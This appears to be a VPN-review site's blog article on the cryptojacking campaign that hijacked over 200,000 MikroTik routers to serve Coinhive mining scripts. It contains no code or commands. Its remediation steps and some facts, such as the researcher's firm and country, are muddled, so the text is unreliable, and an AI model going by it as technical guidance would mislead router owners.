200,000 MikroTik Routers infected with Crypto Mining Malware

MikroTik vulnerable routers

Over 200,000 internet routers of the Latvian company MikroTik got infected by a crypto mining software called Coinhive that prompts the routing device to mine cryptocurrency for the hacker behind the attack.

Latvian Company MikroTik’s Routers got Infected by a Malware

MikroTik is a Latvian network hardware provider for internet modems/routers operating across the globe since 1996. The company has a habit of routinely updating their device to keep up with modern standards, but with its latest update, cybercriminals found several vulnerabilities within the hardware and decided to exploit it in the form of crypto mining.
The problem they found was the inability to detect zero-day malware, which could cause several scenarios of invasion of privacy, including crypto mining and using the router as a listening device.

Several security firms discovered the breach inside MikroTik routers, which was that the malware spread across the routers and infected them using a code that enters through them with crypto mining software by Coinhive.

The Origin of Coinhive the Reason behind MikroTik Router Breach

Coinhive is a cryptocurrency mining service that operates across several devices thanks to a computer code that is usable and installed on Web sites. The service takes its ques from browsers of the device with Coinhive’s Javascript and takes computing power out of them to operate and mine Monero cryptocurrency for the attackers.

The latest opening with the software update of MikroTik routers prompted the hackers to secretly install cryptocurrency mining malware on such devices that were connected with the internet and in use. This latest breach in security among Mikrotik’s routers has infected more than 200,000 routers, and the number is still increasing.

Since the discovery of the vulnerability within the routers, a new patch redeemed the mistake, and things have since gone back to normal. Security firms detected the possible flaw through the Winbox component of MikroTik routers. However, the number increased due to the fact that many users did not update their router’s software according to the latest patch, as many have been unaware of this latest development of invasion of privacy.

The Workings of the CoinHive Bug in the MikroTik Routers

This bug inside MikroTik’s latest update enabled the malware attacker to gain unauthenticated and remote access to any router by the company that hasn’t got updated to the newest redemption patch and used to mine Monero cryptocurrency without the consent of the owner of the router and to decrease their internet’s ability to perform at full capacity. It is why the number of data breaches among the routers is still increasing.

It was all discovered by security researchers at Trutwave in the country of Brazil, and so far as much as the crypto mining attackers have compromised 183,700 unpatched MikroTik routers. This isn’t a story of a single country, due to the popularity and the far reach of the routers, many other hackers have gotten encouragement and formed their own crypto-mining malware to exploit the unpatched MikroTik router bug in other countries as well such as more than 25,000 routers were infected routers that were located in Moldova, and the same crypto-mining software CoinHive was used.

If you are wondering how the CoinHive malware works, then here is the answer according to cybersecurity expert Simon

Kenin: “The attacker created a custom error page with the CoinHive script in it” and “if a user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker.”

It is worth mentioning that the hackers behind the CoinHive malware have the full capacity to infect a considerable scale of routers simultaneously, which is more deadly and effective than going small scale websites or using other complicated channels to insert malicious javascript on the computers to mine coins.

The Several Ways to Redeem MikroTik Routers’ Firmware Vulnerabilities

Committing mistakes are a massive part of life, and we evolve in time by learning through those mistakes, which are what defines our human nature to its core.

MikroTik surely deserved the blame in letting the slip in their security protocol that prompted the hackers to breach the firmware and use it to mine crypto coins. However, once they issued the patch and notified their users of the issue, then the shift of the blame had to go to the users who didn’t do much to solve the simple problem.

If you are puzzled and don’t know what to do in fixing the issue, then follow the guidelines stated below to solve them conveniently:

  • Try to connect to MikroTik router from the internal network, using WinBox or other utilities like TELNET or SSH;
  • Use different ports to connect through the router to the internet, such as TCP/10023 for TELNET and TCP/10022 for SSH ports, which are not accessible to the attacker;
  • You should also contact the support staff of your local ISP and see whether they have any solutions for you to fix the crypto mining and slow browsing issue;
  • If the internet still shows visible flaws and you are still unable to connect freely to your internet connection, then there is one thing that you could do, and it is resetting the MikroTik router to its original factory settings. It is worth mentioning that you, the Wi-Fi name, and the existing password of the connection will also change to the default name.

Once you reset the router, before connecting it to all the devices on the computer, attach a single machine through the Ethernet cable, access the IP address of the router, and update the firmware of it to the latest version, immediately.

Safety Starts from our Vigilancy – Final Thoughts on MikroTik Malware Breach

Router producing companies will try their best to resolve issues related to their product similar to MikroTik’s CoinHive malware infiltration of the firmware as it is bad for business. However, we have to keep notice of all the sudden abnormalities within our devices and the internet and check for notifications and updates more often than not.

Such type of vigilant activity will defeat the malware attackers at their game, and you will never fall victim to such invasive crypto mining scam ever again.

About the author
Julie Splinters
Julie Splinters - VPN service analyst

Julie Splinters is a VPN service analyst at Reviewedbypro.com, who specializes in VPN services and anti-spyware applications. Her major of English Philology and her passion for IT helped her choose the path of an IT writer.

Contact Julie Splinters
About the company Esolutions

The world’s leading VPN